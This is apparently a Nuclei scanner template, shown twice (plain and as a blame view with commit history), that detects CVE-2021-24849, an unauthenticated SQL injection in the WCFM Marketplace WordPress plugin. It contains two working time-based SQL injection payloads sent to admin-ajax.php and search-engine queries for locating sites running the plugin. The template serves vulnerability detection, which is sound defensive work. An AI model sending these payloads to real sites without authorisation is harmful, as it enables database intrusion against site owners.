nuclei-templates/http/cves/2021/CVE-2021-24849.yaml

id: CVE-2021-24849

info:
  name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
  remediation: Fixed in 3.4.12
  reference:
    - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24849
    - https://wordpress.org/plugins/wc-multivendor-marketplace/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24849
    cwe-id: CWE-89
    epss-score: 0.02367
    epss-percentile: 0.89814
    cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: wclovers
    product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace
    fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace
    publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
  tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{post_data}}

    payloads:
      post_data:
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains(body, "success")'
        condition: and
# digest: 4a0a004730450220762529702cf9c44426ee86704109c265d0bdce11a27ee57d58983eee2afe7e5b022100f0231e5ac1bec978442364e9e2c3216b59cff01248ee65e7565c5c29f7c0d188:922c64590222798bb761d5b6d8e72950
Create CVE-2021-24849.yaml 2024-02-13 04:02:40 +00:00			`id: CVE-2021-24849`

			`info:`
			`name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection`
			`author: ritikchaddha`
			`severity: critical`
			`description: \|`
			`The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`remediation: Fixed in 3.4.12`
Create CVE-2021-24849.yaml 2024-02-13 04:02:40 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-24849`
minor update 2024-02-13 05:14:17 +00:00			`- https://wordpress.org/plugins/wc-multivendor-marketplace/`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2021-24849`
			`cwe-id: CWE-89`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`epss-score: 0.02367`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-percentile: 0.89814`
TemplateMan Update [Mon Mar 4 08:20:22 UTC 2024] :robot: 2024-03-04 08:20:22 +00:00			`cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible::::::wordpress::*`
Create CVE-2021-24849.yaml 2024-02-13 04:02:40 +00:00			`metadata:`
TemplateMan Update [Mon Mar 4 08:20:22 UTC 2024] :robot: 2024-03-04 08:20:22 +00:00			`verified: true`
			`max-request: 3`
			`vendor: wclovers`
fix queries 2024-05-23 21:45:20 +00:00			`product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`framework: wordpress`
product/queries updated 2024-05-31 19:23:20 +00:00			`shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace`
			`fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"`
			`tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers`
minor update 2024-02-13 05:14:17 +00:00			`flow: http(1) && http(2)`
Create CVE-2021-24849.yaml 2024-02-13 04:02:40 +00:00
			`http:`
			`- raw:`
			`- \|`
			`GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1`
			`Host: {{Hostname}}`

minor update 2024-02-13 05:14:17 +00:00			`matchers:`
			`- type: dsl`
			`dsl:`
			`- status_code == 200`
			`- contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")`
			`condition: and`
			`internal: true`

			`- raw:`
Create CVE-2021-24849.yaml 2024-02-13 04:02:40 +00:00			`- \|`
			`@timeout: 20s`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`{{post_data}}`

			`payloads:`
			`post_data:`
			`- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"`
			- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"

			`stop-at-first-match: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
minor update 2024-02-13 05:14:17 +00:00			`- 'duration>=5'`
Create CVE-2021-24849.yaml 2024-02-13 04:02:40 +00:00			`- 'status_code == 200'`
minor update 2024-02-13 05:14:17 +00:00			`- 'contains(header, "application/json")'`
			`- 'contains(body, "success")'`
Create CVE-2021-24849.yaml 2024-02-13 04:02:40 +00:00			`condition: and`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a004730450220762529702cf9c44426ee86704109c265d0bdce11a27ee57d58983eee2afe7e5b022100f0231e5ac1bec978442364e9e2c3216b59cff01248ee65e7565c5c29f7c0d188:922c64590222798bb761d5b6d8e72950`